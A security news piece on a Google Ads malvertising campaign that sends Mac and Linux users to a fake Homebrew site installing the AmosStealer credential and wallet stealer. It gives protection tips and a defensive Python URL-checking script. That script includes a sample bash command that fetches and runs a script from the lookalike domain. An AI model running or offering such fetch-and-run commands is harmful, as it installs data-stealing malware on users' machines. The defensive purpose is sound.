Cybercriminals are leveraging Google Ads to distribute malware, targeting Mac and Linux users by redirecting them to a fake Homebrew website designed to deploy an information stealer. This malware campaign, utilizing a tool known as AmosStealer (or Atomic), highlights the growing sophistication of malvertising techniques.
The Malware Campaign in Detail
- Target Audience: Mac and Linux users, specifically those seeking to download Homebrew, a widely used open-source package manager.
- How It Works: Hackers create deceptive Google Ads, displaying the legitimate Homebrew URL (“brew.sh”). However, users are redirected to a fake site (“brewe.sh”), which mimics the official Homebrew website.
- Malware Installation: The fake site instructs users to run a terminal command which, instead of installing Homebrew, deploys the AmosStealer malware.
- Stolen Data: AmosStealer is capable of extracting credentials, browser data, and information from over 50 cryptocurrency extensions and wallets.
Discovery and Expert Alerts
- Security expert Ryan Chenkie discovered the campaign and warned about its potential risks.
- Researcher JAMESWT identified Amos as the malware in question, describing it as a potent tool sold on a subscription basis for $1,000 per month.
Homebrew’s Response
Homebrew’s project leader, Mike McQuaid, expressed frustration over Google’s handling of malvertising:
“This seems taken down now. But it keeps happening again and again, and Google appears to prioritize revenue from scammers.”
While the malicious ad has been removed, the threat persists as hackers can employ other redirection domains.
How to Protect Yourself
- Verify URLs: Always confirm that you are on the official Homebrew website (brew.sh), or on the official site of whichever trusted project you are installing.
- Avoid Sponsored Ads: Refrain from clicking on Google-sponsored ads for software downloads.
- Bookmark Trusted Websites: Access official websites directly by bookmarking them.
- Inspect Terminal Commands: Double-check any command before executing it in your Terminal or shell prompt.
- Use Antivirus Software: Keep your system protected with updated antivirus solutions.
- Stay Informed: Be aware of the latest malvertising campaigns and share alerts to prevent others from falling victim.
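The "Verify URLs" and "Inspect Terminal Commands" checks can be automated before a pasted install command is run. The script below is an added example, not code from Homebrew or from the researchers named above; the allowlist, the function names and both sample commands are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts you have decided to trust for this install. brew.sh is the
# official site named in the article; raw.githubusercontent.com is included
# because the official Homebrew installer is fetched from there.
TRUSTED_HOSTS = {"brew.sh", "raw.githubusercontent.com"}
URL_RE = re.compile(r"https?://[^\s\"'`)<>]+", re.IGNORECASE)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot near-miss hostnames."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def review_command(command: str) -> list[tuple[str, str]]:
    """Return (host, verdict) for every URL found in a pasted command."""
    findings = []
    for url in URL_RE.findall(command):
        # urlsplit ignores any "user@" prefix, so brew.sh@other.host resolves to other.host
        host = (urlsplit(url).hostname or "").lower().rstrip(".")
        if host in TRUSTED_HOSTS:
            verdict = "trusted"
        elif any(edit_distance(host, t) <= 2 for t in TRUSTED_HOSTS):
            verdict = "lookalike"  # e.g. one extra letter in a trusted name
        else:
            verdict = "untrusted"
        findings.append((host, verdict))
    return findings


def safe_to_run(command: str) -> bool:
    """True only if URLs are present and all trusted; no visible URL means manual review."""
    findings = review_command(command)
    return bool(findings) and all(v == "trusted" for _, v in findings)


# Constructed samples: an official-style installer line and a lookalike-domain one.
GOOD = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
BAD = '/bin/bash -c "$(curl -fsSL https://brewe.sh/install.sh)"'

if __name__ == "__main__":
    for cmd in (GOOD, BAD):
        print(safe_to_run(cmd), review_command(cmd))
```

A passing result only means every visible URL points at an allowlisted host; it does not vouch for what the downloaded script does.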
The Bigger Picture: Malvertising Risks
This incident is part of a broader trend where cybercriminals exploit Google Ads to direct unsuspecting users to fake websites. Despite Google’s efforts to combat malicious ads, loopholes remain that scammers exploit.
By raising awareness and practicing caution, users can protect themselves from falling victim to these scams. Sharing incidents like this widely is crucial to pressuring platforms to strengthen their security measures.